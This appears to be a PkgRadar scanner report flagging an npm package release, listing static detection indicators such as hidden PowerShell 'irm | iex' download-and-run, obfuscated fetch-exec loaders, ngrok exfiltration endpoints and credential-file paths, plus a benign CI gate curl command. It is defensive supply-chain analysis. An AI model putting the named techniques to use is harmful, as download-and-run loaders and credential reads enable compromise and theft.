PkgRadar

Package evidence

@cyclonedx/[email protected]

Js Hidden Powershell: Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers.

Trust signals

Why this verdict

PkgRadar discounts a release’s score when public reputation argues against novel malware. The verdict above already reflects these — the panel just explains what was applied.

Weekly downloads
164,418Ubiquitous · −70% score
Versions published
229Mature · −50% score
First published
Feb 2023
Publisher
GitHub ActionsTrusted automation · −70% score

Effective trust discount applied: 70% (max across signals — discounts don’t stack). New install-lifecycle deltas vs the previous release would clear the discount.

Recommended action

Block this update

Static evidence trips multiple high-signal indicators. Quarantine the release until the publisher validates the change or you can rule out the indicators below.

Inspect tarballAdd to CI gate
Block this release in CIcurl · GitHub Actions

Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard.

curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["@cyclonedx/[email protected]"],"fail_on":"high"}'

GitHub Actions step:

- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["@cyclonedx/[email protected]"],"fail_on":"high"}'
PublisherGitHub Actions
Artifact bytes1,999,484
Previous version12.5.1
Published2026-06-14T05:40:46.932Z
SHA-256de10d9d2a6a23d5d6cdda8fdd0d9e26eef960a79fdb070e4c6357f5edca20c2d

Why flagged

What the scanner saw

Js Hidden Powershell: Hidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers.

1 candidate cluster(s) currently reference this release.

Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.

Availability ledger

available

high
Last checked
highRisk
60Score
12.6.0Version
Status history (4 events)
  1. availableavailable · risk high · score 60 · status available -> available, risk high -> high, score 46 -> 60
  2. availableavailable · risk high · score 46 · status available -> available, risk high -> high, score 42 -> 46
  3. availableavailable · risk high · score 42 · status available -> available, risk high -> high, score 41 -> 42
  4. newavailable · risk high · score 41 · status changed

Related candidates

Linked campaigns and clusters

Repeated static TTPactive

Js Obfuscated Fetch Exec — hex-decoded literal + network fetch + child-process exec — staged obfuscated-loader / dropper (hides the c2 url from literal-url detection).

45 members · evidence strength 90
Repeated static TTPcandidate

Js Obfuscated Fetch Exec — hex-decoded literal + network fetch + child-process exec — staged obfuscated-loader / dropper (hides the c2 url from literal-url detection).

45 members · max score 259

Evidence

Static findings

15 static · 0 from release diff · showing high-signal first.

SeverityKindPathDetailPoints
highJs Hidden Powershellpackage/lib/stages/postgen/auditBom.poku.jsHidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers.45
highJs Obfuscated Fetch Execpackage/lib/helpers/utils.poku.jsHex-decoded literal + network fetch + child-process exec — staged obfuscated-loader / dropper (hides the C2 URL from literal-URL detection).45
highWebhook Exfil Endpointpackage/lib/stages/postgen/auditBom.poku.jsmatched "ngrok-free.app"40
highWebhook Exfil Endpointpackage/lib/stages/postgen/postgen.poku.jsmatched "ngrok-free.app"40
mediumTls Verification Disabledpackage/lib/stages/pregen/envAudit.poku.jsmatched "NODE_TLS_REJECT_UNAUTHORIZED: \"0"12
Show all 15 findings (low-signal and informational)
SeverityKindPathDetailPoints
highJs Hidden Powershellpackage/lib/stages/postgen/auditBom.poku.jsHidden / non-interactive PowerShell invocation in package code — `-WindowStyle Hidden`, `irm | iex`, `windowsHide: true`, or equivalent — used to download-and-run payloads on Windows installers.45
highJs Obfuscated Fetch Execpackage/lib/helpers/utils.poku.jsHex-decoded literal + network fetch + child-process exec — staged obfuscated-loader / dropper (hides the C2 URL from literal-URL detection).45
highWebhook Exfil Endpointpackage/lib/stages/postgen/auditBom.poku.jsmatched "ngrok-free.app"40
highWebhook Exfil Endpointpackage/lib/stages/postgen/postgen.poku.jsmatched "ngrok-free.app"40
mediumTls Verification Disabledpackage/lib/stages/pregen/envAudit.poku.jsmatched "NODE_TLS_REJECT_UNAUTHORIZED: \"0"12
lowCredential file accesspackage/lib/stages/postgen/auditBom.poku.jsmatched ".ssh/"5
lowCredential file accesspackage/lib/managers/docker.poku.jsmatched ".aws/"5
lowMessenger Bot Endpointpackage/lib/helpers/formulationParsers.poku.jsmatched "ngrok-free.app" — notification/dev-tunnel URL without exfil context5
lowCredential file accesspackage/lib/cli/index.jsmatched ".npmrc"5
lowCredential file accesspackage/lib/cli/index.poku.jsmatched ".ssh/"5
lowCredential file accesspackage/lib/helpers/npmutils.jsmatched ".npmrc"5
lowCredential file accesspackage/lib/helpers/osqueryTransform.poku.jsmatched ".ssh/"5
lowCredential file accesspackage/lib/helpers/utils.jsmatched ".npmrc"5
lowCredential file accesspackage/lib/helpers/utils.poku.jsmatched ".npmrc"5
lowCredential file accesspackage/data/crypto-oid.jsonmatched "ID_RSA"3

Manifest

Package metadata

Scripts8
  • gen-typespnpm exec tsc
  • install:frozenpnpm install --config.strict-dep-builds=true --frozen-lockfile --package-import-method copy
  • install:prodpnpm install --config.strict-dep-builds=true --frozen-lockfile --package-import-method copy --prod
  • lintbiome check --write
  • lint:checkbiome check
  • lint:errorsbiome check --diagnostic-level=error
  • testpoku
  • watchpoku --watch
Dependencies35
  • @babel/parser7.29.7
  • @babel/traverse7.29.7
  • @iarna/toml2.2.5
  • @isaacs/string-locale-compare1.1.0
  • @npmcli/fs5.0.0
  • @npmcli/map-workspaces5.0.3
  • @npmcli/name-from-folder4.0.0
  • @npmcli/package-json7.0.5
  • ajv8.20.0
  • ajv-formats3.0.1
  • bin-links6.0.2
  • cheerio1.2.0
  • common-ancestor-path1.0.1
  • edn-data1.1.2
  • glob13.0.6
  • got14.6.6
  • iconv-lite0.7.2
  • json-stringify-nice1.1.4
  • keyv5.6.0
  • node-stream-zip1.15.0
  • npm-package-arg13.0.2
  • packageurl-js1.0.2
  • parse-conflict-json5.0.1
  • properties-reader3.0.1
  • read-package-json-fast5.0.0
  • semver7.8.2
  • ssri13.0.1
  • tar7.5.16
  • treeverse3.0.0
  • uuid14.0.0
  • …and 5 more.
Optional dependencies21
  • @appthreat/atom2.5.5
  • @appthreat/atom-parsetools1.2.2
  • @bufbuild/protobuf2.12.0
  • @cdxgen/cdx-hbom0.5.0
  • @cdxgen/cdx-proto2.0.3
  • @cdxgen/cdxgen-plugins-bin2.5.1
  • @cdxgen/cdxgen-plugins-bin-darwin-amd642.5.1
  • @cdxgen/cdxgen-plugins-bin-darwin-arm642.5.1
  • @cdxgen/cdxgen-plugins-bin-linux-amd642.5.1
  • @cdxgen/cdxgen-plugins-bin-linux-arm2.5.1
  • @cdxgen/cdxgen-plugins-bin-linux-arm642.5.1
  • @cdxgen/cdxgen-plugins-bin-linux-ppc642.5.1
  • @cdxgen/cdxgen-plugins-bin-linuxmusl-amd642.5.1
  • @cdxgen/cdxgen-plugins-bin-linuxmusl-arm642.5.1
  • @cdxgen/cdxgen-plugins-bin-windows-amd642.5.1
  • @cdxgen/cdxgen-plugins-bin-windows-arm642.5.1
  • @cdxgen/safer-exec0.11.0
  • body-parser2.2.2
  • compression1.8.1
  • connect3.7.0
  • jsonata2.2.1